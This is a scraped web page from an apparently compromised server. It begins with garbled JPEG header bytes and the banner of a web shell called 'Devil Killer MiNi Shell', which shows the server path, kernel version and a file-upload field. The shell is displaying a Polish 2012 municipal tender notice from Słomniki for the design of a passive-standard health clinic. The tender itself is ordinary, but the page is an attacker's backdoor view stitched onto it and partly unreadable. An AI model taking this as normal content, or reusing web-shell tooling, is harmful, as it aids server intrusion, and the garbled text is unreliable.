JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120913/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120913/345200-N-2012.html

<p class="kh_header"><b>Słomniki: Wykonanie  dokumentacji projektowej Przychodni Zdrowia w Słomnikach.</b><br>
<b>Numer ogłoszenia: 345200 - 2012; data zamieszczenia: 13.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Słomniki , ul. Kościuszki 64, 32-090 Słomniki, woj. małopolskie, tel. 012 3881102, faks 012 3882102.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.slomniki.pl/um</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie  dokumentacji projektowej Przychodni Zdrowia w Słomnikach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> A.Przedmiot zamówienia obejmuje: 
WYKONANIE  DOKUMENTACJI PROJEKTOWEJ OŚRODKA ZDROWIA  W SŁOMNIKACH.
Dokumentacja projektowa musi odpowiadać  wymogom określonym w Rozporządzeniu  Ministra Infrastruktury z dnia  2 września 2004 r.  w sprawie szczegółowego zakresu  i form dokumentacji projektowej , specyfikacji technicznej wykonania i odbioru robót oraz programu funkcjonalno - użytkowego zgodnie z §4.1 Dz. U. z 2004 r. Nr 202, poz 2072 dokumentacji  oraz określonym w Rozporządzeniu Ministra Zdrowia z dnia 10 listopada 2006 roku w sprawie wymagań jakim powinny odpowiadać pod względem fachowym i sanitarnym pomieszczenia i urządzenia zakładu opieki zdrowotnej ( Dz.U.2006.2013.1568 z późn. zminami.

Przedmiot zamówienia obejmuje zaprojektowanie inwestycji obejmującej budynek przychodni zdrowia w technologii pasywnej ,  z infrastrukturą techniczną i zagospodarowaniem terenu.
 Powierzchnia terenu ( działki nr ewid. 396/5 i 396/8 położone w Słomnikach) na których należy zaprojektować przedmiot zamówienia wynosi  ok.  0,35 ha.

B. Dokumentacja projektowa przychodni zdrowia obejmuje wykonanie:
I ETAP- wykonanie do 30.03.2013 rok ( I transza płatności w wysokości 25% wartości zamówienia)

Koncepcji inwestycji obejmującej budynek przychodni zdrowia wraz z koncepcją zagospodarowania terenu. Koncepcja inwestycji musi zawierać minimum:
1.	program użytkowy wskazany przez zamawiającego oraz ewentualnie dodatkowe pomieszczenia i funkcje wymagane prawem wraz z propozycją aranżacji wnętrza budynku
2.	koncepcję bryły budynku wraz z koncepcją zagospodarowania terenu(proponowane rozwiązania budynku dotyczące technologii budynku pasywnego, planowane trasami przebiegu przyłączy, układ komunikacyjny, zieleń).
3.	 proponowane rozwiązania dotyczące użytkowania budynku tj. ogrzewania budynku, sposobu ogrzewania ciepłej wody użytkowej.
4.	kalkulacje bilansu energetycznego budynku wykonana w programie PHPP
 Projekt inwestycji będzie realizowany na podstawie zaakceptowanej koncepcji przez zamawiającego.
Wymagane jest aby wykonawca na etapie prac nad koncepcją inwestycji przeprowadzał konsultacje z Zamawiającym.
Za termin zakończenia I Etapu uznaje się termin  pisemnego zgłoszenia Wykonawcy o zakończeniu I Etapu prac projektowych.
Wraz z pisemnym zgłoszeniem o zakończeniu prac projektowych ujętych w I ETAPIE wykonawca przekazuje zaakceptowaną koncepcję projektową inwestycji ( 4 egzemplarze w wersji papierowej + zapisaną na nośniku elektronicznym).


II ETAP- wykonanie pełnej dokumentacji wraz z uzyskaniem prawomocnej decyzji pozwolenia na budowę ( II transza płatności pozostałe 75% wartości zamówienia)- do 31.11.2013 roku.

W II Etapie należy wykonać
1.	projekt architektoniczno-budowlany przychodni zdrowia, budynek w systemie pasywnym wraz z wykonaniem  badań geologicznych i wszelkimi uzgodnieniami projektu wraz z wewnętrznymi instalacjami elektroenergetycznymi, wod- kan, co, instalacji wentylacji mechanicznej z wysokoefektywnym odzyskiem ciepła, instalacji stałoprądowych, teletechniczne, monitoringu zewnętrznego i wewnętrznego).
2.	projekty przyłączy ( wodociągowego, kanalizacji sanitarnej i deszczowej, teletechnicznego, energetycznego, gazowego). Centralne ogrzewanie w budynku wykorzystujące kotłownia gazową. Możliwe jest również zaprojektowanie instalacji solarnej.
3.	projekt zjazdu z drogi publicznej( drogi gminnej)
4.	projekt zagospodarowania terenu w powiązaniu z zaprojektowanym w bezpośrednim sąsiedztwie projektowanej inwestycji  budynkiem przedszkola  wraz z infrastrukturą (działki nr 396/6  i 396/9 w Słomnikach)
5.	projekty wykonawcze
6.	przedmiary robót, kosztorysy inwestorskie, specyfikacje techniczne wykonania i odbioru robót.
7.	uzyskanie prawomocnej decyzji pozwolenia na budowę w oparciu o udzielone przez Zamawiającego pełnomocnictwo
8.	Ostateczną kalkulację PHPP zawierającą finalne rozwiązania budowlane i instalacyjne
9.	Wykonawca jest zobowiązany do przekazania Zamawiającemu kompletnej dokumentacji będącej przedmiotem niniejszej umowy w formie papierowej oraz elektronicznej na nośniku CD lub DVD w formie plików PDF. Wykonawca przekaże Zamawiającemu kompletny projekt wykonawczy i specyfikację techniczna wykonania i odbioru robót budowlanych   w 4 egzemplarzach w wersji papierowej.
Za zakończenie całości  niniejszego zamówienia w tym II ETAPU uznaje się dzień wpływu pisemnego zgłoszenia Wykonawcy o zakończeniu prac projektowych wraz z załączoną prawomocną decyzją pozwolenia na budowę projektowanej inwestycji i  pełną dokumentacją projektową określoną w SIWZ.

C. Projekt należy wykonać w zgodzie z zapisami miejscowego planu zagospodarowania przestrzennego obowiązującego dla przedmiotowych działek, obowiązującymi przepisami prawa  oraz wskazaniami  Zamawiającego.
Zamawiający przekaże Wykonawcy po podpisaniu umowy aktualną mapę sytuacyjno-wysokościową do celów projektowych, wypis z miejscowego planu zagospodarowania przestrzennego oraz wyciąg z dokumentacji zaprojektowanego na działkach sąsiednich budynku przedszkola.
D. Wymagania dotyczące programu funkcjonalnego obiektu 
I. Poradnie ogólne:
1.	6 gabinetów lekarskich o powierzchni min. 12 m2 każdy
2.	1 gabinet zabiegowy o powierzchni min 16 m2
3.	Gabinet USG o powierzchni min. 12 m 2
4.	Pomieszczenie rejestracji z archiwum na dokumentację ( pomieszczenie rejestracji zlokalizowane w holu głównym w centralnej części budynku na parterze )
5.	3 sanitariaty ( 1 dla personelu, 1 dla pacjentów, 1 dla osób niepełnosprawnych) w przypadku budynku jednopiętrowego należy uwzględnić również sanitariaty na piętrze budynku
6.	1 pomieszczenie administracyjno- biurowe ok 20 m2
7.	Gabinet dyrektora połączony komunikacyjnie z pomieszczeniem administracyjno- biurowym
8.	Pokój socjalny z jadalnią ze zlewem i umywalką
9.	Pomieszczenie gospodarcze z brudownikiem wyposażone w zlew
10.	2 pomieszczenia techniczne
11.	Magazyny na bieliznę, środki czystości, środki medyczne
12.	Pomieszczenie do składowania odpadów medycznych
13.	Szatnie dla personelu z natryskiem i ubikacją
Poradnia dziecięca:
.	rejestracja
.	ubikacja przystosowana dla osób niepełnosprawnych
.	ubikacja dla personelu
.	2 gabinety lekarskie o powierzchni min 12m2 w poradni dziecka chorego
.	1 gabinet lekarski  ( poradnia dziecka zdrowego z niezależnym wejściem z zewnątrz) o powierzchni min 12 m2 połączony z gabinetem przygotowawczo zabiegowym o powierzchni min. 16 m2
.	Punk szczepień
II. Poradnia Stomatologiczna
.	Gabinet stomatologiczny o powierzchni min 12 m2
.	Pomieszczenie przygotowawcze i sterylizacji min 10 m2
.	Pomieszczenie na urządzenie RTG dla potrzeb stomatologii min 8m2
III. Poradnia chirurgiczna
.	Gabinet lekarski powierzchnia min 12 m2
.	Gabinet zabiegowy powierzchnia min 16 m2
.	Gabinet pielęgniarski powierzchnia min 12m2
IV. Poradnia ginekologiczna
.	Gabinet lekarski o powierzchni min 12m2 z kabina higieny intymnej i pokojem przygotowawczym dla położnej o powierzchni min 12 m2
V. Poradnia okulistyczna
.	Gabinet lekarski o powierzchni min 12 m2
.	Ciemnia ok 12 m2
VI. Poradnia laryngologiczna
.	Gabinet lekarski min 12 m2
.	Kabina dźwiękoszczelna do badań
VII. Pogotowie ratunkowe
.	Pokoje socjalne , dyżurka, sanitariat- pomieszczenia z oddzielnym wejściem z zewnątrz
.	Garaż  lub wiata dla karetki 
X.  Komunikacja w budynku uwzględniająca konieczność transportu chorych na łóżkach, wózkach oraz możliwość ustawiania krzeseł na korytarzach.
XI. W przypadku gdy konieczne będzie zaprojektowanie windy należy  zlokalizować w centralnej części budynku w holu głównym.
XIII. We wszystkich gabinetach lekarskich umywalka z ciepłą i zimna wodą. Wszystkie gabinety lekarskie wyposażone w dostęp do interenetu (od 2014 roku  wchodzi dokumentacja elektroniczna).

2. Wymagania dotyczące energooszczędności:
1.	całkowite zapotrzebowanie  budynku na ciepło na cele grzewcze - maks. 15 kWh/ m2a
2.	szczelność budynku na poziomie - n50 < 0,3 h-1
3.	zastosowana instalacja wentylacji mechanicznej z wysokoefektywnym odzyskiem ciepła
4.	okna o całościowym współczynniku U<0,8 W/m2K

E. Wymagania formalno prawne.
1.	Projekt budowlany winien spełniać wszelkie wymogi obowiązującej ustawy Prawo budowlane z dn. 7 lipca 1994 r.(Dz. U. z 2010r. nr 243, poz. 1623) oraz Rozporządzenia Ministra Infrastruktury z dn. 03 lipca 2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z 2003r. nr 120, poz. 1133).
2.	Projekt budowlany należy uzgodnić branżowo z zainteresowanymi stronami. Dokumentacja projektowa powinna uwzględniać wnioski i zalecenia decyzji o środowiskowych uwarunkowaniach zgody na realizację inwestycji (jeżeli wystąpi decyzja).
3.	Wykonawca zobowiązany jest do opracowania dokumentacji z zachowaniem poniższych warunków:
       a) Część projektową zgodnie z:
-	Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczególnego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno- użytkowego (Dz.U.z dnia 16.04.2004r.,Nr 202,poz.12072 z późniejszymi zmianami),
-	Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz.U. z dnia 10.07.2003r., nr120, poz.1133 z późniejszymi zamianami)
-	Rozporządzeniem Rady Ministrów z dnia 9 listopada 2010r. w sprawie przedsięwzięć mogących znacząco oddziaływać na środowisko Dz. U. 10.213.1397 ustawy z dnia 3 października 2008r. o udostępnieniu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływaniu na środowisko (Dz. U.. Nr 199, poz.1227 ze zm.)      
b)	część kosztorysową zgodnie z:
-	Rozporządzenie Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie określenia metod i podstaw sporządzenia kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcyjno- użytkowym (Dz. U. z dnia8.06.2004r. Nr 130,poz.1389).
4.	Wszystkie załączone kserokopie i odpisy: map, uzgodnień itp. winny posiadać potwierdzenie zgodności z oryginałem. 
5.	Po stronie wykonawcy dokumentacji projektowej leży uzyskanie pozwolenia na budowę w imieniu  inwestora. 
6.	Dokumentacja projektowa w swojej treści nie może określać technologii robót, rodzajów materiałów i innych warunków w sposób utrudniający uczciwą konkurencję oraz ma być przygotowana zgodnie z ustawą Prawo zamówień publicznych.
7.	przekazanie zamawiającemu dokumentacji stanowiącej przedmiot zamówienia wraz przeniesieniem na Zamawiającego autorskich praw majątkowych do dokumentacji projektowej objętej przedmiotem zamówienia na zasadach określonych w § 9 umowy.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wymagania dotyczące wadium
1.Zamawiający wymaga wniesienia wadium  
2.Ustala się wadium w wysokości: 
2.000,00 zł, słownie: dwa tysiące złotych 00/100
3.Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej, formie:
   1) w pieniądzu, przelewem na rachunek bankowy: przelew na konto zamawiającego BS Słomniki
39 8614 0001 0000 0000 0420 0019
         Za skuteczne wniesienie wadium w pieniądzu, Zamawiający uważa wadium, które w oznaczonym terminie (przed upływem terminu składania ofert) znajdzie się na koncie Zamawiającego - data uznania rachunku Zamawiającego (zaleca się przelew najpóźniej do dnia poprzedzającego dzień składania ofert z uwagi na operacje bankowe).
Wpłacając wadium w formie przelewu w tytule należy wpisać wadium na przetarg:
Wykonanie  dokumentacji projektowej Przychodni Zdrowia w Słomnikach.
- oraz podać nazwę Wykonawcy składającego ofertę 
2)w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym,
3)w gwarancjach bankowych, 
4)w gwarancjach ubezpieczeniowych 
5)w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 104,poz.1158 z poz. zm.) 
 sposób przekazania wadium w formie dokumentów: oryginał należy złożyć w  pok nr 7 Urzędu Miejskiego w Słomnikach ul. Kościszki 64, 32-090 Słomniki przed upływem terminu składania ofert, kopię należy dołączyć do oferty.

4.Za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku zamawiającego. 
5.W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art. 45 i 46.
6.W przypadku nie zabezpieczenia oferty jedną z określonych w niniejszej specyfikacji form wadium wykonawca zostanie wykluczony z udziału w postępowaniu, a jego oferta podlegać będzie odrzuceniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia niniejszego warunku Wykonawca składa Oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien złożyć wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie;
-	Wykaz  wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych  usług  w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,- co najmniej  dwóch  usług polegających  na zaprojektowaniu budynku użyteczności publicznej z czego jedna usługa polegała na zaprojektowaniu budynku użyteczność publicznej w systemie pasywnym tj winien posiadać  parametry nie gorsze niż
-	całkowite zapotrzebowanie na ciepło na cele grzewcze - maks. 15 kWh/ m2a
-	szczelność budynku na poziomie - n50 < 0,6 h-1
-	zastosowany system wentylacji z odzyskiem ciepła

Kubatura poszczególnych budynków nie mniejsza niż 6000m3, budynki wyposażone w wewnętrzne instalacje elektryczne stałoprądowe, wod-kan, co i wentylacji mechanicznej z odzyskiem ciepła.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia niniejszego warunku Wykonawca składa Oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)	wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontroli jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;(załącznik 7 do SIWZ)
-Wykonawcy winni udokumentować, że dysponują zespołem projektowym w szczególności przynajmniej po jednej z osób z uprawnieniami do projektowania w specjalności 
-	uprawnienia budowlane w specjalności architektonicznej, konstrukcyjno -budowlanej;
-	uprawnienia instalacyjne w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych;
-	uprawnienia instalacyjne w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych;
2) oświadczenie że  osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;(załącznik 6 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać się posiadaniem Opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
